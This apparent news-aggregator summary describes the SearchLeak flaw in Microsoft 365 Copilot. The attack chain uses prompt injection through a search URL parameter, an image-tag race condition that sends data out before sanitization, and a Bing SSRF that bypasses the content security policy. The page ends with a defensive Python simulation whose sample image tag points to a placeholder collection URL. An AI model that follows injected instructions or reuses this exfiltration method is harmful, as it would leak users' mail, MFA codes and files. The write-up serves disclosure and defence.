SearchLeak vulnerability exposes Microsoft 365 Copilot data

Critical security flaw in Microsoft 365 Copilot allows data theft via a single link. Essential for enterprise security.
30-Second TL;DR
What Changed
Vulnerability chain identified in Microsoft 365 Copilot Enterprise Search
Why It Matters
This vulnerability highlights the critical need for robust data access controls within enterprise AI agents. Organizations must audit their Copilot search permissions to prevent unauthorized data exposure.
What To Do Next
Audit your Microsoft 365 Copilot search permissions and restrict access to sensitive data sources immediately.
Deep Insight
Web-grounded analysis with 12 cited sources.
Enhanced Key Takeaways
- The 'SearchLeak' vulnerability, assigned CVE-2026-42824 with a critical severity rating by Microsoft, is a three-stage attack chain combining a Parameter-to-Prompt (P2P) Injection, an HTML Rendering Race Condition, and a Content Security Policy (CSP) Bypass via Bing Server-Side Request Forgery (SSRF).
- The exploit allowed attackers to silently exfiltrate sensitive data such as MFA codes, email messages, calendar details, and private organizational files from a victim's mailbox, calendar, SharePoint, and OneDrive accounts.
- Microsoft has already remediated the 'SearchLeak' vulnerability on its backend, meaning no user action is required to mitigate this specific threat.
- The vulnerability leveraged a relatively new class of AI-specific weakness (Parameter-to-Prompt Injection) in conjunction with classic web security bugs, highlighting how AI systems can create new pathways to exploit older vulnerabilities in impactful ways.
- Traditional anti-phishing filters and URL filtering tools were unlikely to detect the malicious link because it pointed to a legitimate microsoft.com domain, making the attack highly stealthy.
Competitor Analysis
Microsoft 365 Copilot Competitor Analysis
| Feature/Aspect | Microsoft 365 Copilot | OpenAI ChatGPT Enterprise / Teams | Anthropic Claude for Enterprise | Google Gemini for Workspace | GoSearch | Glean | Coworker AI |
|---|---|---|---|---|---|---|---|
| Primary Focus | AI assistant embedded across Microsoft 365 suite | B2B conversational AI with enhanced security | Leading competitor to OpenAI, strong Amazon backing | Multimodal AI with native Google Workspace integration | Agentic Enterprise AI Search across entire tech stack | Enterprise search platform across internal systems | AI that both searches and executes actions across mixed stacks |
| Data Integration | Microsoft Graph (M365 data: Word, Excel, Outlook, Teams, SharePoint, OneDrive) | Enterprise data (specifics depend on integration) | Enterprise data (specifics depend on integration) | Google Workspace data | 100+ integrations (Slack, Jira, Confluence, Salesforce, etc.) | 100+ integrations (Slack, Box, Google Drive, OneDrive, SharePoint, etc.) | 40+ native integrations (Salesforce, Slack, Jira, Google Drive, etc.) |
| Security Posture | Enterprise-grade data privacy and security, honors existing M365 controls | Enhanced security, collaboration, user management | Strong security, guardrails | Enterprise-grade data privacy and security | Hybrid federated and indexed architecture, permission-aware answers | Robust compliance and end-to-end data security, guardrails | Enterprise-grade security |
| Key Capabilities | Document drafting, data analysis, email summarization, team communication, unified search | Conversational AI, team workflows, browser tasks | Autonomous multi-step tasks on local files/apps | Deep Research, real-time web access | Unified AI search and action, knowledge centralization | Powerful search, generative AI features, cites sources | Cross-tool search and execution (e.g., update CRM, create Jira tickets) |
| Pricing (per user/month) | Bundles start at $22 (promotional), add-on for existing M365 subscribers | Not specified, B2B version | Not specified, B2B version | Gemini Advanced: $20 | Custom enterprise pricing (typically $10-15) | Custom enterprise pricing (typically $10-15) | $30 (no M365 license required) |
| Limitations | Primarily limited to Microsoft 365 ecosystem; challenges with mixed tech stacks | Search-only for some aspects (e.g., Glean) | Search-only, not for market/investment research | | | | |
Technical Deep Dive
- Parameter-to-Prompt (P2P) Injection: The vulnerability chain began by exploiting how Microsoft 365 Copilot Enterprise Search processes the 'q' URL parameter. Instead of treating the content of this parameter solely as a search query, Copilot interpreted it as executable instructions, allowing an attacker to inject malicious prompts.
- HTML Rendering Race Condition: The second stage involved a timing vulnerability. When Copilot streamed its output, an injected `<img>` tag within the AI's response would fire its request to an external server before the output sanitizer could wrap the raw HTML in `<code>` blocks, which would neutralize it. This allowed the image request, containing exfiltrated data, to be sent before being blocked.
- CSP Bypass via Bing SSRF: The final stage exploited Bing's image-search endpoint, which was allowlisted in the Content Security Policy (CSP). This endpoint performed a server-side fetch to an attacker-controlled URL. The `<img>` tag, triggered by the race condition, directed Bing to fetch the attacker's URL, which included the stolen data, effectively bypassing the page's CSP and exfiltrating the information.
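The race condition in the second stage comes down to the order of "render" and "sanitize". The following is an added example, not code from the page or from Microsoft: a small simulation of a streaming renderer, fed constructed chunks with a placeholder URL, that contrasts the vulnerable ordering (sanitize only once the stream ends) with the hardened ordering (escape every chunk before it goes live).

```python
import html
import re

# A browser-like renderer: every <img src=...> it sees in live markup is a
# request it issues immediately, which is exactly why stream timing matters.
IMG_SRC = re.compile(r'<img[^>]+src=["\']([^"\']+)["\']', re.IGNORECASE)

# Constructed sample stream (not captured traffic): three tokens of model
# output, the middle one carrying raw HTML. The URL is a placeholder only.
SAMPLE_CHUNKS = [
    "Here is the summary you asked for: ",
    '<img src="https://example.invalid/collect?d=PLACEHOLDER">',
    " (end of answer)",
]


def sanitize(markup: str) -> str:
    """Post-stream sanitizer: wrap output containing raw HTML in a <code>
    block with the markup escaped, so it displays as text instead of rendering."""
    return "<code>" + html.escape(markup) + "</code>" if "<" in markup else markup


def render_sanitize_after_stream(chunks):
    """Vulnerable ordering: each chunk goes live as received; sanitize() runs
    only once the stream is complete. Returns (final_markup, requests), where
    requests are the URLs the renderer had already fetched mid-stream."""
    live, requests = "", []
    for chunk in chunks:
        live += chunk
        for url in IMG_SRC.findall(live):
            if url not in requests:
                requests.append(url)  # fires before sanitize() ever runs
    return sanitize(live), requests


def render_escape_before_render(chunks):
    """Hardened ordering: each chunk is escaped before it touches the live
    output, so markup is never live and stream timing no longer matters."""
    live, requests = "", []
    for chunk in chunks:
        live += html.escape(chunk)
        for url in IMG_SRC.findall(live):
            if url not in requests:
                requests.append(url)
    return live, requests
```

The vulnerable path ends with correctly sanitized markup yet has already issued the request; the hardened path produces no request at all, which is the property a defender should test for rather than trusting the final rendered output.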
AI-curated news aggregator. All content rights belong to original publishers.
Original source: The Next Web (TNW)